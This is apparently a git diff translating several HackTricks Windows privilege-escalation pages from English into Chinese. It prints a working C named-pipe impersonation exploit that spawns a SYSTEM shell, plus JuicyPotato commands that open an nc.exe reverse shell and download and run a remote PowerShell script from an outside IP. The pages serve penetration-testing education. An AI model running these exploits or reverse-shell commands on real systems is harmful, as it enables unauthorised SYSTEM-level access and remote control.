 - [https://www.passcape.com/index.php?section=docsys\&cmd=details\&id=28#13](https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13)
 - [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c)
 
 <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
 
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最相关的网络安全事件之一，也是**欧洲**最重要的事件之一。该大会**旨在促进技术知识**，是各个学科技术和网络安全专业人士的一个热烈的交流点。
 
 {% embed url="https://www.rootedcon.com/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
index 80302fd1e..7db0d39d5 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/from-high-integrity-to-system-with-name-pipes.md
@@ -1,15 +1,14 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-**Code flow:**
+**代码流程：**
 
-1. Create a new Pipe
-2. Create and start a service that will connect to the created pipe and write something. The service code will execute this encoded PS code: `$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
-3. The service receive the data from the client in the pipe, call ImpersonateNamedPipeClient and waits for the service to finish
-4. Finally, uses the token obtained from the service to spawn a new _cmd.exe_
+1. 创建一个新的管道
+2. 创建并启动一个服务，该服务将连接到创建的管道并写入内容。服务代码将执行以下编码的 PS 代码：`$pipe = new-object System.IO.Pipes.NamedPipeClientStream("piper"); $pipe.Connect(); $sw = new-object System.IO.StreamWriter($pipe); $sw.WriteLine("Go"); $sw.Dispose();`
+3. 服务从管道中的客户端接收数据，调用 ImpersonateNamedPipeClient 并等待服务完成
+4. 最后，使用从服务获得的令牌生成一个新的 _cmd.exe_
 
 > [!WARNING]
-> If you don't have enough privileges the exploit may get stucked and never return.
-
+> 如果您没有足够的权限，漏洞利用可能会卡住并且永远不会返回。
 ```c
 #include <windows.h>
 #include <time.h>
@@ -22,100 +21,98 @@
 
 int ServiceGo(void) {
 
-	SC_HANDLE scManager;
-	SC_HANDLE scService;
+SC_HANDLE scManager;
+SC_HANDLE scService;
 
-	scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
+scManager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
 
-	if (scManager == NULL) {
-		return FALSE;
-	}
+if (scManager == NULL) {
+return FALSE;
+}
 
-	// create Piper service
-	scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
-		SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
-		"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
-		NULL, NULL, NULL, NULL, NULL);
+// create Piper service
+scService = CreateServiceA(scManager, PIPESRV, PIPESRV, SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
+SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
+"C:\\Windows\\\System32\\cmd.exe /rpowershell.exe -EncodedCommand JABwAGkAcABlACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFAAaQBwAGUAcwAuAE4AYQBtAGUAZABQAGkAcABlAEMAbABpAGUAbgB0AFMAdAByAGUAYQBtACgAIgBwAGkAcABlAHIAIgApADsAIAAkAHAAaQBwAGUALgBDAG8AbgBuAGUAYwB0ACgAKQA7ACAAJABzAHcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHAAaQBwAGUAKQA7ACAAJABzAHcALgBXAHIAaQB0AGUATABpAG4AZQAoACIARwBvACIAKQA7ACAAJABzAHcALgBEAGkAcwBwAG8AcwBlACgAKQA7AA==",
+NULL, NULL, NULL, NULL, NULL);
 
-	if (scService == NULL) {
-		//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
-		return FALSE;
-	}
+if (scService == NULL) {
+//printf("[!] CreateServiceA() failed: [%d]\n", GetLastError());
+return FALSE;
+}
 
-	// launch it
-	StartService(scService, 0, NULL);
+// launch it
+StartService(scService, 0, NULL);
 
-	// wait a bit and then cleanup
-	Sleep(10000);
-	DeleteService(scService);
+// wait a bit and then cleanup
+Sleep(10000);
+DeleteService(scService);
 
-	CloseServiceHandle(scService);
-	CloseServiceHandle(scManager);
+CloseServiceHandle(scService);
+CloseServiceHandle(scManager);
 }
 
 int main() {
 
-	LPCSTR sPipeName = "\\\\.\\pipe\\piper";
-	HANDLE hSrvPipe;
-	HANDLE th;
-	BOOL bPipeConn;
-	char pPipeBuf[MESSAGE_SIZE];
-	DWORD dBRead = 0;
+LPCSTR sPipeName = "\\\\.\\pipe\\piper";
+HANDLE hSrvPipe;
+HANDLE th;
+BOOL bPipeConn;
+char pPipeBuf[MESSAGE_SIZE];
+DWORD dBRead = 0;
 
-	HANDLE hImpToken;
-	HANDLE hNewToken;
-	STARTUPINFOA si;
-	PROCESS_INFORMATION pi;
+HANDLE hImpToken;
+HANDLE hNewToken;
+STARTUPINFOA si;
+PROCESS_INFORMATION pi;
 
-	// open pipe
-	hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
-		PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
+// open pipe
+hSrvPipe = CreateNamedPipeA(sPipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT,
+PIPE_UNLIMITED_INSTANCES, 1024, 1024, 0, NULL);
 
-	// create and run service
-	th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);
+// create and run service
+th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ServiceGo, NULL, 0, 0);
 
-	// wait for the connection from the service
-	bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
-	if (bPipeConn) {
-		ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);
+// wait for the connection from the service
+bPipeConn = ConnectNamedPipe(hSrvPipe, NULL);
+if (bPipeConn) {
+ReadFile(hSrvPipe, &pPipeBuf, MESSAGE_SIZE, &dBRead, NULL);
 
-		// impersonate the service (SYSTEM)
-		if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
-			return -1;
-		}
+// impersonate the service (SYSTEM)
+if (ImpersonateNamedPipeClient(hSrvPipe) == 0) {
+return -1;
+}
 
-		// wait for the service to cleanup
-		WaitForSingleObject(th, INFINITE);
+// wait for the service to cleanup
+WaitForSingleObject(th, INFINITE);
 
-		// get a handle to impersonated token
-		if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
-			return -2;
-		}
+// get a handle to impersonated token
+if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hImpToken)) {
+return -2;
+}
 
-		// create new primary token for new process
-		if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
-			TokenPrimary, &hNewToken)) {
-			return -4;
-		}
+// create new primary token for new process
+if (!DuplicateTokenEx(hImpToken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation,
+TokenPrimary, &hNewToken)) {
+return -4;
+}
 
-		//Sleep(20000);
-		// spawn cmd.exe as full SYSTEM user
-		ZeroMemory(&si, sizeof(si));
-		si.cb = sizeof(si);
-		ZeroMemory(&pi, sizeof(pi));
-		if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,
-			NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
-			return -5;
-		}
+//Sleep(20000);
+// spawn cmd.exe as full SYSTEM user
+ZeroMemory(&si, sizeof(si));
+si.cb = sizeof(si);
+ZeroMemory(&pi, sizeof(pi));
+if (!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, L"cmd.exe", NULL,
+NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {
+return -5;
+}
 
-		// revert back to original security context
-		RevertToSelf();
+// revert back to original security context
+RevertToSelf();
 
-	}
+}
 
-	return 0;
+return 0;
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index c220d9937..d515d24ce 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -4,43 +4,40 @@
 
 ## Integrity Levels
 
-In Windows Vista and later versions, all protected items come with an **integrity level** tag. This setup mostly assigns a "medium" integrity level to files and registry keys, except for certain folders and files that Internet Explorer 7 can write to at a low integrity level. The default behavior is for processes initiated by standard users to have a medium integrity level, whereas services typically operate at a system integrity level. A high-integrity label safeguards the root directory.
+在 Windows Vista 及更高版本中，所有受保护的项目都有一个 **完整性级别** 标签。此设置通常将“中等”完整性级别分配给文件和注册表项，除了某些 Internet Explorer 7 可以以低完整性级别写入的文件和文件夹。默认情况下，标准用户启动的进程具有中等完整性级别，而服务通常在系统完整性级别下运行。高完整性标签保护根目录。
 
-A key rule is that objects can't be modified by processes with a lower integrity level than the object's level. The integrity levels are:
+一个关键规则是，具有低于对象级别的完整性级别的进程无法修改对象。完整性级别如下：
 
-- **Untrusted**: This level is for processes with anonymous logins. %%%Example: Chrome%%%
-- **Low**: Mainly for internet interactions, especially in Internet Explorer's Protected Mode, affecting associated files and processes, and certain folders like the **Temporary Internet Folder**. Low integrity processes face significant restrictions, including no registry write access and limited user profile write access.
-- **Medium**: The default level for most activities, assigned to standard users and objects without specific integrity levels. Even members of the Administrators group operate at this level by default.
-- **High**: Reserved for administrators, allowing them to modify objects at lower integrity levels, including those at the high level itself.
-- **System**: The highest operational level for the Windows kernel and core services, out of reach even for administrators, ensuring protection of vital system functions.
-- **Installer**: A unique level that stands above all others, enabling objects at this level to uninstall any other object.
+- **不可信**：此级别适用于匿名登录的进程。 %%%示例：Chrome%%%
+- **低**：主要用于互联网交互，特别是在 Internet Explorer 的受保护模式下，影响相关文件和进程，以及某些文件夹，如 **临时 Internet 文件夹**。低完整性进程面临重大限制，包括无法写入注册表和有限的用户配置文件写入访问权限。
+- **中**：大多数活动的默认级别，分配给标准用户和没有特定完整性级别的对象。即使是管理员组的成员默认也在此级别操作。
+- **高**：保留给管理员，允许他们修改低完整性级别的对象，包括高完整性级别的对象。
+- **系统**：Windows 内核和核心服务的最高操作级别，甚至管理员也无法触及，确保保护重要的系统功能。
+- **安装程序**：一个独特的级别，超越所有其他级别，使该级别的对象能够卸载任何其他对象。
 
-You can get the integrity level of a process using **Process Explorer** from **Sysinternals**, accessing the **properties** of the process and viewing the "**Security**" tab:
+您可以使用 **Sysinternals** 的 **Process Explorer** 获取进程的完整性级别，访问进程的 **属性** 并查看 "**安全性**" 选项卡：
 
 ![](<../../images/image (824).png>)
 
-You can also get your **current integrity level** using `whoami /groups`
+您还可以使用 `whoami /groups` 获取您的 **当前完整性级别**
 
 ![](<../../images/image (325).png>)
 
 ### Integrity Levels in File-system
 
-A object inside the file-system may need an **minimum integrity level requirement** and if a process doesn't have this integrity process it won't be able to interact with it.\
-For example, lets **create a regular from a regular user console file and check the permissions**:
-
+文件系统中的对象可能需要 **最低完整性级别要求**，如果进程没有此完整性级别，则无法与其交互。\
+例如，让我们 **从普通用户控制台创建一个常规文件并检查权限**：
 ```
 echo asd >asd.txt
 icacls asd.txt
 asd.txt BUILTIN\Administrators:(I)(F)
-        DESKTOP-IDJHTKP\user:(I)(F)
-        NT AUTHORITY\SYSTEM:(I)(F)
-        NT AUTHORITY\INTERACTIVE:(I)(M,DC)
-        NT AUTHORITY\SERVICE:(I)(M,DC)
-        NT AUTHORITY\BATCH:(I)(M,DC)
+DESKTOP-IDJHTKP\user:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\INTERACTIVE:(I)(M,DC)
+NT AUTHORITY\SERVICE:(I)(M,DC)
+NT AUTHORITY\BATCH:(I)(M,DC)
 ```
-
-Now, lets assign a minimum integrity level of **High** to the file. This **must be done from a console** running as **administrator** as a **regular console** will be running in Medium Integrity level and **won't be allowed** to assign High Integrity level to an object:
-
+现在，让我们为文件分配最低的完整性级别为 **高**。这 **必须在以** 管理员 **身份运行的控制台中完成**，因为 **常规控制台** 将在中等完整性级别下运行，并且 **不允许** 将高完整性级别分配给对象：
 ```
 icacls asd.txt /setintegritylevel(oi)(ci) High
 processed file: asd.txt
@@ -48,16 +45,14 @@ Successfully processed 1 files; Failed processing 0 files
 
 C:\Users\Public>icacls asd.txt
 asd.txt BUILTIN\Administrators:(I)(F)
-        DESKTOP-IDJHTKP\user:(I)(F)
-        NT AUTHORITY\SYSTEM:(I)(F)
-        NT AUTHORITY\INTERACTIVE:(I)(M,DC)
-        NT AUTHORITY\SERVICE:(I)(M,DC)
-        NT AUTHORITY\BATCH:(I)(M,DC)
-        Mandatory Label\High Mandatory Level:(NW)
+DESKTOP-IDJHTKP\user:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\INTERACTIVE:(I)(M,DC)
+NT AUTHORITY\SERVICE:(I)(M,DC)
+NT AUTHORITY\BATCH:(I)(M,DC)
+Mandatory Label\High Mandatory Level:(NW)
 ```
-
-This is where things get interesting. You can see that the user `DESKTOP-IDJHTKP\user` has **FULL privileges** over the file (indeed this was the user that created the file), however, due to the minimum integrity level implemented he won't be able to modify the file anymore unless he is running inside a High Integrity Level (note that he will be able to read it):
-
+这就是事情变得有趣的地方。你可以看到用户 `DESKTOP-IDJHTKP\user` 对文件拥有 **完全权限**（实际上这是创建该文件的用户），然而，由于实施的最低完整性级别，他将无法再修改该文件，除非他在高完整性级别下运行（请注意，他仍然可以读取该文件）：
 ```
 echo 1234 > asd.txt
 Access is denied.
@@ -66,35 +61,31 @@ del asd.txt
 C:\Users\Public\asd.txt
 Access is denied.
 ```
-
 > [!NOTE]
-> **Therefore, when a file has a minimum integrity level, in order to modify it you need to be running at least in that integrity level.**
+> **因此，当一个文件具有最低完整性级别时，要修改它，您需要至少在该完整性级别运行。**
 
-### Integrity Levels in Binaries
-
-I made a copy of `cmd.exe` in `C:\Windows\System32\cmd-low.exe` and set it an **integrity level of low from an administrator console:**
+### 二进制中的完整性级别
 
+我在 `C:\Windows\System32\cmd-low.exe` 中复制了 `cmd.exe` 并从管理员控制台将其设置为 **低完整性级别：**
 ```
 icacls C:\Windows\System32\cmd-low.exe
 C:\Windows\System32\cmd-low.exe NT AUTHORITY\SYSTEM:(I)(F)
-                                BUILTIN\Administrators:(I)(F)
-                                BUILTIN\Users:(I)(RX)
-                                APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
-                                APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
-                                Mandatory Label\Low Mandatory Level:(NW)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Users:(I)(RX)
+APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
+Mandatory Label\Low Mandatory Level:(NW)
 ```
-
-Now, when I run `cmd-low.exe` it will **run under a low-integrity level** instead of a medium one:
+现在，当我运行 `cmd-low.exe` 时，它将**在低完整性级别下运行**，而不是中等级别：
 
 ![](<../../images/image (313).png>)
 
-For curious people, if you assign high integrity level to a binary (`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`) it won't run with high integrity level automatically (if you invoke it from a medium integrity level --by default-- it will run under a medium integrity level).
+对于好奇的人，如果你将高完整性级别分配给一个二进制文件（`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`），它不会自动以高完整性级别运行（如果你从中等完整性级别调用它 -- 默认情况下 -- 它将以中等完整性级别运行）。
 
-### Integrity Levels in Processes
+### 进程中的完整性级别
 
-Not all files and folders have a minimum integrity level, **but all processes are running under an integrity level**. And similar to what happened with the file-system, **if a process wants to write inside another process it must have at least the same integrity level**. This means that a process with low integrity level can’t open a handle with full access to a process with medium integrity level.
+并非所有文件和文件夹都有最低完整性级别，**但所有进程都在完整性级别下运行**。与文件系统发生的情况类似，**如果一个进程想要在另一个进程内部写入，它必须至少具有相同的完整性级别**。这意味着低完整性级别的进程无法以完全访问权限打开中等完整性级别进程的句柄。
 
-Due to the restrictions commented in this and the previous section, from a security point of view, it's always **recommended to run a process in the lower level of integrity possible**.
+由于本节和前一节中提到的限制，从安全角度来看，始终**建议以尽可能低的完整性级别运行进程**。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index 9ffe0a8b4..619a0e871 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -3,55 +3,54 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!WARNING]
-> **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
+> **JuicyPotato在** Windows Server 2019 和 Windows 10 build 1809 及之后的版本上**无法工作**。然而， [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) 可以用来 **利用相同的权限并获得 `NT AUTHORITY\SYSTEM`** 级别的访问权限。 _**检查：**_
 
 {{#ref}}
 roguepotato-and-printspoofer.md
 {{#endref}}
 
-## Juicy Potato (abusing the golden privileges) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
+## Juicy Potato (滥用黄金权限) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
 
-_A sugared version of_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, with a bit of juice, i.e. **another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM**_
+_一个经过糖化的_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG) _版本，带有一点果汁，即 **另一个本地权限提升工具，从 Windows 服务账户到 NT AUTHORITY\SYSTEM**_
 
-#### You can download juicypotato from [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
+#### 你可以从 [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts) 下载 juicypotato
 
-### Summary <a href="#summary" id="summary"></a>
+### 摘要 <a href="#summary" id="summary"></a>
 
-[**From juicy-potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
+[**来自 juicy-potato 的 Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**
 
-[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) and its [variants](https://github.com/decoder-it/lonelypotato) leverages the privilege escalation chain based on [`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) having the MiTM listener on `127.0.0.1:6666` and when you have `SeImpersonate` or `SeAssignPrimaryToken` privileges. During a Windows build review we found a setup where `BITS` was intentionally disabled and port `6666` was taken.
+[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) 及其 [变体](https://github.com/decoder-it/lonelypotato) 利用基于 [`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [服务](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) 的权限提升链，具有在 `127.0.0.1:6666` 上的 MiTM 监听器，并且当你拥有 `SeImpersonate` 或 `SeAssignPrimaryToken` 权限时。在一次 Windows 构建审查中，我们发现一个设置，其中 `BITS` 被故意禁用，端口 `6666` 被占用。
 
-We decided to weaponize [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Say hello to Juicy Potato**.
+我们决定武器化 [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)：**向 Juicy Potato 打个招呼**。
 
-> For the theory, see [Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) and follow the chain of links and references.
+> 有关理论，请参见 [Rotten Potato - 从服务账户到 SYSTEM 的权限提升](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) 并跟随链接和参考链。
 
-We discovered that, other than `BITS` there are a several COM servers we can abuse. They just need to:
+我们发现，除了 `BITS` 之外，还有几个 COM 服务器可以利用。它们只需要：
 
-1. be instantiable by the current user, normally a “service user” which has impersonation privileges
-2. implement the `IMarshal` interface
-3. run as an elevated user (SYSTEM, Administrator, …)
+1. 由当前用户实例化，通常是具有模拟权限的“服务用户”
+2. 实现 `IMarshal` 接口
+3. 以提升的用户身份运行（SYSTEM，Administrator，…）
 
-After some testing we obtained and tested an extensive list of [interesting CLSID’s](http://ohpe.it/juicy-potato/CLSID/) on several Windows versions.
+经过一些测试，我们获得并测试了一份在多个 Windows 版本上的 [有趣 CLSID 的广泛列表](http://ohpe.it/juicy-potato/CLSID/)。
 
-### Juicy details <a href="#juicy-details" id="juicy-details"></a>
+### Juicy 细节 <a href="#juicy-details" id="juicy-details"></a>
 
-JuicyPotato allows you to:
+JuicyPotato 允许你：
 
-- **Target CLSID** _pick any CLSID you want._ [_Here_](http://ohpe.it/juicy-potato/CLSID/) _you can find the list organized by OS._
-- **COM Listening port** _define COM listening port you prefer (instead of the marshalled hardcoded 6666)_
-- **COM Listening IP address** _bind the server on any IP_
-- **Process creation mode** _depending on the impersonated user’s privileges you can choose from:_
-  - `CreateProcessWithToken` (needs `SeImpersonate`)
-  - `CreateProcessAsUser` (needs `SeAssignPrimaryToken`)
-  - `both`
-- **Process to launch** _launch an executable or script if the exploitation succeeds_
-- **Process Argument** _customize the launched process arguments_
-- **RPC Server address** _for a stealthy approach you can authenticate to an external RPC server_
-- **RPC Server port** _useful if you want to authenticate to an external server and firewall is blocking port `135`…_
-- **TEST mode** _mainly for testing purposes, i.e. testing CLSIDs. It creates the DCOM and prints the user of token. See_ [_here for testing_](http://ohpe.it/juicy-potato/Test/)
-
-### Usage <a href="#usage" id="usage"></a>
+- **目标 CLSID** _选择你想要的任何 CLSID。_ [_这里_](http://ohpe.it/juicy-potato/CLSID/) _你可以找到按操作系统组织的列表。_
+- **COM 监听端口** _定义你喜欢的 COM 监听端口（而不是硬编码的 6666）_
+- **COM 监听 IP 地址** _在任何 IP 上绑定服务器_
+- **进程创建模式** _根据模拟用户的权限，你可以选择：_
+- `CreateProcessWithToken`（需要 `SeImpersonate`）
+- `CreateProcessAsUser`（需要 `SeAssignPrimaryToken`）
+- `两者`
+- **要启动的进程** _如果利用成功，启动一个可执行文件或脚本_
+- **进程参数** _自定义启动进程的参数_
+- **RPC 服务器地址** _为了隐蔽的方法，你可以认证到外部 RPC 服务器_
+- **RPC 服务器端口** _如果你想认证到外部服务器并且防火墙阻止端口 `135`，这很有用…_
+- **测试模式** _主要用于测试目的，即测试 CLSID。它创建 DCOM 并打印令牌的用户。请参见_ [_这里进行测试_](http://ohpe.it/juicy-potato/Test/)
 
+### 使用 <a href="#usage" id="usage"></a>
 ```
 T:\>JuicyPotato.exe
 JuicyPotato v0.1
@@ -68,25 +67,23 @@ Optional args:
 -k <ip>: RPC server ip address (default 127.0.0.1)
 -n <port>: RPC server listen port (default 135)
 ```
+### 最后思考 <a href="#final-thoughts" id="final-thoughts"></a>
 
-### Final thoughts <a href="#final-thoughts" id="final-thoughts"></a>
+[**来自 juicy-potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
 
-[**From juicy-potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**
+如果用户拥有 `SeImpersonate` 或 `SeAssignPrimaryToken` 权限，那么你就是 **SYSTEM**。
 
-If the user has `SeImpersonate` or `SeAssignPrimaryToken` privileges then you are **SYSTEM**.
+几乎不可能防止所有这些 COM 服务器的滥用。你可以考虑通过 `DCOMCNFG` 修改这些对象的权限，但祝你好运，这将是一个挑战。
 
-It’s nearly impossible to prevent the abuse of all these COM Servers. You could think about modifying the permissions of these objects via `DCOMCNFG` but good luck, this is gonna be challenging.
+实际的解决方案是保护在 `* SERVICE` 账户下运行的敏感账户和应用程序。停止 `DCOM` 无疑会抑制此漏洞，但可能会对底层操作系统产生严重影响。
 
-The actual solution is to protect sensitive accounts and applications which run under the `* SERVICE` accounts. Stopping `DCOM` would certainly inhibit this exploit but could have a serious impact on the underlying OS.
+来自: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
 
-From: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
+## 示例
 
-## Examples
-
-Note: Visit [this page](https://ohpe.it/juicy-potato/CLSID/) for a list of CLSIDs to try.
-
-### Get a nc.exe reverse shell
+注意: 访问 [此页面](https://ohpe.it/juicy-potato/CLSID/) 获取可尝试的 CLSID 列表。
 
+### 获取 nc.exe 反向 shell
 ```
 c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
 
@@ -99,36 +96,32 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
 
 c:\Users\Public>
 ```
-
 ### Powershell rev
-
 ```
 .\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
 ```
-
-### Launch a new CMD (if you have RDP access)
+### 启动新的 CMD（如果您有 RDP 访问权限）
 
 ![](<../../images/image (300).png>)
 
-## CLSID Problems
+## CLSID 问题
 
-Oftentimes, the default CLSID that JuicyPotato uses **doesn't work** and the exploit fails. Usually, it takes multiple attempts to find a **working CLSID**. To get a list of CLSIDs to try for a specific operating system, you should visit this page:
+通常，JuicyPotato 使用的默认 CLSID **无法工作**，并且漏洞利用失败。通常，需要多次尝试才能找到一个 **有效的 CLSID**。要获取特定操作系统的 CLSID 列表，您应该访问此页面：
 
 {% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
 
-### **Checking CLSIDs**
+### **检查 CLSID**
 
-First, you will need some executables apart from juicypotato.exe.
+首先，您需要一些可执行文件，除了 juicypotato.exe。
 
-Download [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) and load it into your PS session, and download and execute [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). That script will create a list of possible CLSIDs to test.
